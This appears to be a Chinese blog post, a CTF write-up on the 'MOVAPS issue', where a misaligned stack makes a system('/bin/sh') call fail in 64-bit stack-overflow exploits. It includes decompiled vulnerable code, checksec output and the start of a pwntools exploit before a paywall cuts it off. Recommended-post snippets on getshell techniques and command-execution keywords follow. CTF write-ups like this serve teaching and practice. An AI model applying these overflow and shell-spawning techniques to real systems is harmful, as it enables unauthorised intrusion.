【CTF大赛】100步getshell之就差一步——The MOVAPS issue

最新推荐文章于 2025-03-12 10:48:54 发布
原创 最新推荐文章于 2025-03-12 10:48:54 发布 · 441 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #信息安全 #计算机网络

本文介绍了在CTF比赛中遇到的The MOVAPS issue,该问题导致在栈溢出攻击中即使获取了system地址也无法成功执行shell。文章分析了问题原因,涉及到Ubuntu 18.04的GLIBC函数对栈16字节对齐的要求,并通过两个CTF挑战(DownUnderCTF2021-outBackdoor和Tamilctf2021-Nameserver)的例子说明了解决方案,即在调用GLIBC函数前确保栈对齐。

在这里插入图片描述
当你完美的在栈上进行了布局,泄露了libc的地址,并且在libc中获得了syetem地址,获得了’/bin/sh’地址,此时此时就差一步sendline就打通了,可是你忽然发现,什么?为什么system失败了?地址也对啊,检查了一遍又一遍,全部都对啊。

此时的你开始怀疑,是不是Server上用了个新的libc?是不是地址获取错误?总之一万个问题向你来袭。但其实可能就只是一个retn解决的问题,在最后一步绊倒了你。这个问题其实就是The MOVAPS issue

问题的起因

首先放上小明同学最近遇到的两个题目:

Tamilctf2021,pwn,Nameserver
DownUnderCTF2021,pwn,outBackdoor
有兴趣的小伙伴可以看看这两个题目。两个题目很相似,都是栈溢出,控制了eip.但是!都拿不到shell!!气人不

DownUnderCTF2021-outBackdoor

DownUnderCTF中简单很多,直接提供了一个outBackdoor函数

保护机制

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

漏洞

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[16]; // [rsp+0h] [rbp-10h] BYREF
 
  buffer_init(argc, argv, envp);
  puts("\nFool me once, shame on you. Fool me twice, shame on me.");
  puts("\nSeriously though, what features would be cool? Maybe it could play a song?");
  gets(v4);
  return 0;
}
int outBackdoor()
{
  puts("\n\nW...w...Wait? Who put this backdoor out back here?");
  return system("/bin/sh");
}
 
//main的v4栈结构
-0000000000000010 var_10          db 16 dup(?)
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables

很简单,栈溢出,根据main的栈结构,我们知道只需要填充0x10+8个数据,就可以覆盖到eip。

是不是很简单?exploit如下:

#!/usr/bin/python
#coding:utf-8[/size][/align][align=left][size=3]
from pwn import *
 
context(os = 'linux', log_level='debug')
local_path = './outBackdoor'
addr = 'pwn-2021.duc.tf'
port = 31921
 
is_local = 1
 
if is_local != 0:
    io = process(local_path,close_fds=True)
 
else:
    io = remote(addr, port)
# io = gdb.debug(local_path)
 
elf=ELF(local_path)
p_backdoor=elf.symbols['outBackdoor']
 
p_main = elf.symbols['main']
p_system = elf.symbols['system']
p_bin_sh = 0x4020CD
最低0.47元/天 解锁文章
wustctf2020_getshell
m0sway的博客
11-28 876
wustctf2020_getshell 使用checksec查看: 只开启了一个栈不可执行,没开Canary,考虑栈溢出题目。 拉进IDA中查看: 主函数中直接给漏洞函数,跟进: read()函数,能读取0x20的数据,buf距离ebp0x18,因为这是个32位的程序,ebp+4后还能放下一个one_gadget 首先考虑下这个程序本身有没有get_shell的函数,通过搜索字符串可以发现函数shell(): ok了,这题直接秒了。 exp: from pwn import * #start
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3947
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
CTF_Web:8位以内可控字符getshell
AFCC_的博客(Web_Dog)
08-04 1835
题目来源 近期在练习CTF中的web题目时遇到一个8位字符以内可以随意执行命令,最终需要getshell 的题目,发现很多前辈都写了这类型的题解,但也需要自己实践一下,题目源码访问后如图: 思路:可以看出当提交的参数1包含的值少于8位时,都会当作命令执行,首先?1=ls发现所有文件名都超过了8位,显然单靠这8位执行命令是不足以cat某个文件,于是需要利用拼接文件名执行代码getshell。 解题利用知识点 >a "在linux中会直接创建这个文件,但没有内容" ls -t "将目录中的文件以时间顺
CTF训练(密码学)——一步之遥
i2423374729的博客
04-19 368
CTF训练(密码学)——一步之遥 题目已经告诉我们是位移密码了 将题目下载下来 解压后打开 解题: 考察移位密码,题目提示64m/s的速度,联想到base64编码。>>联想到==,ascii码了一位题目本身也提示一步(A Step),所以移动位数为1位。 于是我们写一个python脚本 再base64解码得到flag:SeBaFi{a24bccba30824eab8d40168cf1c1ff5a} ...
Bugku CTF_Web——getshell
weixin_71914594的博客
11-08 694
蚁剑里有个插件可以绕过disable_functions。密码还是和连接第一次的密码一样。放进解密在线网站解一下。再连接新生成的绕过木马。一个混淆类php代码。连接后慢慢找flag。
CTF——PWN——栈溢出(4.getshell
qq_45215609的博客
09-19 538
CTF——PWN——栈溢出(4.getshell
逐鹿中原极客之光——记首届Real World国际CTF网络安全大赛.pdf
09-20
逐鹿中原极客之光——记首届Real World国际CTF网络安全大赛.pdf
2019某行业CTF大赛题目复现——图片隐写
qwsn
11-06 2728
0x01上题目附件: 百度网盘地址 提取码 https://pan.baidu.com/s/13hDSgmW4cn9gEWqHjJrWIw 20ra 0x02WP复现: 1.打开图片:发现宽和高好像没有什么问题; 但是我们还是使用010软件,修改后查看一下,万一就是那么简单呢? 一顿操作猛如虎,一看战绩一杠五。。。。。。发现改完宽高后,图片损坏了,无法打开。看来要使用其他方法...
精选资源
2021CTF工业信息安全大赛第一场题.rar
09-19
【标题】"2021CTF工业信息安全大赛第一场题.rar" 提供的信息表明,这是一个与2021年工业信息安全领域的CTF(Capture The Flag)比赛相关的压缩包文件,其中包含了第一场比赛的试题。CTF比赛通常涉及网络安全、密码学...
bugku ctfgetshell
qq_42777804的博客
08-02 590
打开之后 是 文件上传 但是不可以上传 php文件 说明存在过滤 一共三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type 上传的文件可以为任意文件,内容也可以是任意的,内容也可以为空 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如mulTipart/form-data (其中t为大写) 所上传的文...
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 2068
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
[GHCTF 2025]GetShell
2401_86190146的博客
03-12 1055
定义环境变量LFILE,指向受保护文件/flag,后续可以通过$LFILE引用该路径,避免直接硬编实际命令在蚁剑终端输入。
PWN简单栈溢出漏洞获取shell
SkYe's Blog
08-13 3073
PWN简单栈溢出漏洞获取shell 题目来源 下载链接(密码akcz) CTF的时候需要的是获取系统shell,然后通过shell去拿到flag。 条件所限,那我们就先将程序放本地。也就是本地机也充当远程服务器角色 1. 运行程序、查看文件类型、保护措施 程序输出一段应该是内存地址的16位字符串;接着要求我们输入,之后就结束运行程序。 程序为32位动态链接的ELF文件 可以看到NX保护关...
[buuctf]wustctf2020_getshell
逆向萌新的博客
07-02 883
[buuctf]wustctf2020_getshell
栈溢出至getshell分析及利用
zkaqlaoniao的博客
10-07 550
以下使用一个在程序作为例题进行分析。
CTF中的命令执行绕过
蚁景网安学院
04-21 3660
作为CTF最基础的操作,命令执行的学习主要是为了以后进一步使用webshell打下基础
CTF综合测试低难度过程记录
如烟
05-27 610
CTF综合测试低难度过程记录 Kali:192.168.159.129 靶机:192.168.159.136 上传shell 捕捉到数据包,点击Forward 点击shell.jpg执行 并没有返回shell 发现忘记去掉注释了 而且漏掉一步: 可以看到反弹的shell了 执行执行~ sql语句末尾一定要加分号 得到密码:asd123*** 参考教程: https://w...
攻防世界新手get_shell题目总结
xindada559的博客
06-07 393
这个题目应该shi
BugKuCTF中套路满满的题--------getshell
qq_42133828的博客
12-19 1041
这道题目是一个关于文件上传的题目, 而他的绕过机制是黑名单检测和类型检测 黑名单检测:使用php5绕过,其他的(php3,phtml,php4.。。)都绕不过 类型检测:抓包,改参数filename:2.php5  ,有两个Content-Type,先改第二个的Content-Type:image/jpeg  ,再改第一个的Content-Type:Multipart/form-data; ...
getshell CTF.pcapng
最新发布
11-13
要从CTF.pcapng文件中获取getshell相关信息,可以采用以下方法: ### 利用Wireshark进行分析 Wireshark是一款强大的网络数据包分析工具,可按如下骤操作: 1. **打开文件**:启动Wireshark,选择“文件” - “打开”,选中CTF.pcapng文件打开。 2. **过滤HTTP请求**:getshell通常会通过HTTP协议传输数据,在过滤框中输入 `http` 过滤出所有HTTP请求。 3. **查找关键字**:在过滤后的数据包列表中,查找与getshell相关的关键字,如 `cmd`、`system`、`exec`、`phpinfo`、`eval` 等。可通过 “查找数据包” 功能(快捷键 `Ctrl + F`),在 “显示过滤器” 中输入关键字进行查找。 ```plaintext # 示例查找关键字 cmd system exec phpinfo eval ``` 4. **分析请求和响应**:找到包含关键字的数据包后,查看HTTP请求和响应的详细内容,分析是否存在异常的命令执行或文件上传操作。 ### 使用Tshark进行命令行分析 Tshark是Wireshark的命令行版本,适合批量处理和自动化分析。以下是使用Tshark查找关键字的示例命令: ```bash tshark -r CTF.pcapng -Y "http" -T fields -e http.request.full_uri -e http.response.content | grep -i "cmd\|system\|exec\|phpinfo\|eval" ``` 上述命令将过滤出所有HTTP请求和响应,并查找包含指定关键字的内容。 ### 编写Python脚本分析 借助Scapy库可以编写Python脚本来分析pcapng文件,以下是一个简单示例: ```python from scapy.all import rdpcap packets = rdpcap('CTF.pcapng') for packet in packets: if 'TCP' in packet and 'Raw' in packet: payload = str(packet['Raw'].load) keywords = ['cmd', 'system', 'exec', 'phpinfo', 'eval'] for keyword in keywords: if keyword in payload.lower(): print(f"Found keyword '{keyword}' in packet: {packet.summary()}") ``` ### 分析文件上传和命令执行 getshell通常伴随着文件上传或命令执行操作。可查找包含文件上传的POST请求,分析上传的文件类型和内容;同时查找包含命令执行的GET或POST请求,分析执行的命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值